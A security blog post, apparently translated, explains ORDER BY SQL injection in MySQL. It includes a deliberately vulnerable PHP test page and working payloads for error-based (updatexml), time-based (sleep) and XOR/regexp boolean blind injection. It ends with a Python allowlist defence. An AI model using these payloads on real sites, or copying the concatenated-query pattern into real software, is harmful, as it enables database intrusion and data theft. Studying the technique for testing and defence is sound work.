0x00 Background
I read an earlier post by gr36_ on Prophet about ORDER BY injection. I have run into this kind of problem often lately, so I am first summarising what I know about ORDER BY injection.
0x01 Environment Information
Test environment: Ubuntu 14.04.1, MySQL 5.5.55-0
Test code:
<?php
$mysql_server    = "10.10.10.136";
$mysql_username  = "root";
$mysql_userpass  = "xxxxx";
$mysql_select_db = "Test";
$config = mysql_connect($mysql_server, $mysql_username, $mysql_userpass) or die(mysql_error());
$db = mysql_select_db($mysql_select_db) or die(mysql_error());
if (isset($_REQUEST['evil'])) {
    $evil = $_REQUEST['evil'];
    // Deliberately vulnerable: the raw parameter is concatenated into ORDER BY.
    $query = "SELECT * from Test order by user_id $evil;";      // variant without parentheses
    $query = "(SELECT * from Test order by user_id $evil);";    // variant with parentheses; overrides the line above (used for the union test in 0x02)
    // The MySQL error text is echoed back, which is what the error-based injection relies on.
    $result = mysql_query($query, $config) or die($query . '<pre>' . mysql_error() . '</pre>');
    $num  = mysql_num_rows($result);
    $html = '';
    $i    = 0;
    while ($i < $num) {
        $user_id  = mysql_result($result, $i, "user_id");
        $user     = mysql_result($result, $i, "user");
        $password = mysql_result($result, $i, "password");
        $html .= "<pre>user_id: {$user_id} user: {$user} password: {$password}</pre>";
        $i++;
    }
    mysql_close();
    echo $query;
    echo $html;
}
?>
0x02 Introduction to the injection methods
Normal page:
1. ORDER BY with error-based injection:
When the page displays MySQL error messages, the error text can be used to carry out the injection:
?evil=and (updatexml(1,concat(0x7e,(select user())),0))
2. ORDER BY and blind injection:
Boolean-based blind injection is used when the page does not display MySQL error messages and the result can only be judged from the state of the data the page echoes back.
"Of course, rain master also mentioned that time-based blind injection can be used: select * from Test order by user_id,(select 1 from (select sleep(3))a)"
This uses the ^ (bitwise XOR) operator; MySQL also has | (bitwise OR), & (bitwise AND), ~ (bitwise NOT), >> (right shift) and << (left shift). The bit operators have quite a few neat uses, which I will not go into here :-).
^ (bitwise XOR) converts the values on both sides to binary and XORs them bit by bit.
When the regular expression matches, the subquery returns 1 (00000001). XORing 1 with each user_id gives a value that differs from the user_id itself, and the rows are then sorted in ascending order by that XOR result, so the displayed order changes.
When the regular expression does not match, the subquery returns 0 (00000000). Any number XOR 0 is the number itself, so the sort key equals user_id and the order stays the same.
Therefore, if the page's sort order is disturbed, the regular expression matched the data; if the order is unchanged, it did not.
So the change in order tells us whether the guess was correct. The MySQL version here is 5.5.55-0, so the statement below matches and the order changes. The '^5' can also be written in hexadecimal so that the statement contains no quotes.
evil=^(select (select version()) regexp '^5') makes the regexp return 1, which is then XORed with user_id, giving the following result:
Before sort                                                   | After sort (ORDER BY user_id^1, ascending)
user_id | user_id (binary) | regexp result (binary) | user_id^1 | user_id | user_id (binary) | regexp result (binary) | user_id^1
1       | 00000001         | 00000001               | 00000000  | 1       | 00000001         | 00000001               | 00000000
2       | 00000010         | 00000001               | 00000011  | 3       | 00000011         | 00000001               | 00000010
3       | 00000011         | 00000001               | 00000010  | 2       | 00000010         | 00000001               | 00000011
4       | 00000100         | 00000001               | 00000101  | 5       | 00000101         | 00000001               | 00000100
5       | 00000101         | 00000001               | 00000100  | 4       | 00000100         | 00000001               | 00000101
6       | 00000110         | 00000001               | 00000111  | 7       | 00000111         | 00000001               | 00000110
7       | 00000111         | 00000001               | 00000110  | 6       | 00000110         | 00000001               | 00000111
Because ORDER BY sorts in ascending order by default, the page displays the rows in the "after sort" order shown above.
evil=^(select (select version()) regexp '^aaaaaa') does not match the data, so the subquery returns 0.
When the regexp does not match, the result is 0, and any number XOR 0 is the number itself, so the sort order is unchanged:
user_id | user_id (binary) | regexp result (binary) | user_id^0
1       | 00000001         | 00000000               | 00000001
2       | 00000010         | 00000000               | 00000010
3       | 00000011         | 00000000               | 00000011
4       | 00000100         | 00000000               | 00000100
5       | 00000101         | 00000000               | 00000101
6       | 00000110         | 00000000               | 00000110
7       | 00000111         | 00000000               | 00000111
3. ORDER BY and UNION queries:
When the query is $query = "SELECT * from Test order by user_id $evil;"; (no surrounding parentheses), a UNION query cannot be used directly.
When the query is $query = "(SELECT * from Test order by user_id $evil);"; (wrapped in parentheses), a UNION query becomes possible.
This is also described in the official MySQL documentation (the MySQL 5.5 reference manual), which says that ORDER BY or LIMIT should be placed after the last SELECT.
In the tested mysql 5.5.55-0 it could also be placed before it. Of course, this situation is not very common.
0x03 A short summary
Because a value passed into a prepared statement as a parameter cannot be used as part of the SQL syntax itself (for example the column and direction in ORDER BY xxx DESC), sort clauses are still commonly built by string concatenation.
Therefore, ORDER BY injection is worth treating as a key focus among SQL injection points in later vulnerability hunting.
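Added example (not from gr36_'s post or its PHP listing): a Python model of the XOR sort-order behaviour from section 0x02 (the row order flips only when the REGEXP subquery returns 1) together with the allowlist approach the summary points to, since a sort column or direction cannot be a bound parameter. It assumes an in-memory SQLite stand-in for the Test table; the function names are mine.

```python
import sqlite3

# Constructed sample: the seven user_id values used in the tables above.
USER_IDS = [1, 2, 3, 4, 5, 6, 7]


def displayed_order(user_ids, regexp_result):
    """Row order MySQL produces for `ORDER BY user_id ^ <subquery>`.

    regexp_result is the 0/1 the injected REGEXP subquery evaluates to;
    the sort key is user_id XOR that bit, ascending, exactly as in the
    post's two tables.
    """
    return sorted(user_ids, key=lambda uid: uid ^ regexp_result)


def order_changed(user_ids, regexp_result):
    """The observable the post relies on: did the row order get disturbed?"""
    return displayed_order(user_ids, regexp_result) != sorted(user_ids)


# Defender side. A column name or ASC/DESC cannot be bound as a prepared
# statement parameter, so the fix is to map user input onto an allowlist
# and never concatenate the raw value into the query.
ALLOWED_COLUMNS = {"user_id": "user_id", "user": "user"}
ALLOWED_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def build_order_by(column, direction="asc"):
    """Return a safe ORDER BY clause or raise ValueError on unknown input."""
    try:
        return f"ORDER BY {ALLOWED_COLUMNS[column]} {ALLOWED_DIRECTIONS[direction.lower()]}"
    except KeyError:
        raise ValueError("unsupported sort column or direction") from None


def demo_db():
    """In-memory SQLite stand-in (constructed) for the post's Test table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Test (user_id INTEGER, user TEXT, password TEXT)")
    conn.executemany("INSERT INTO Test VALUES (?, ?, ?)",
                     [(i, f"user{i}", "secret") for i in USER_IDS])
    return conn


def fetch_user_ids(conn, column, direction="asc"):
    """Hardened version of the PHP listing's query: sort clause comes from the allowlist."""
    sql = "SELECT user_id FROM Test " + build_order_by(column, direction)
    return [row[0] for row in conn.execute(sql)]
```

Passing the post's `^(select (select version()) regexp '^5')` payload as the column name is rejected with ValueError instead of reaching the database.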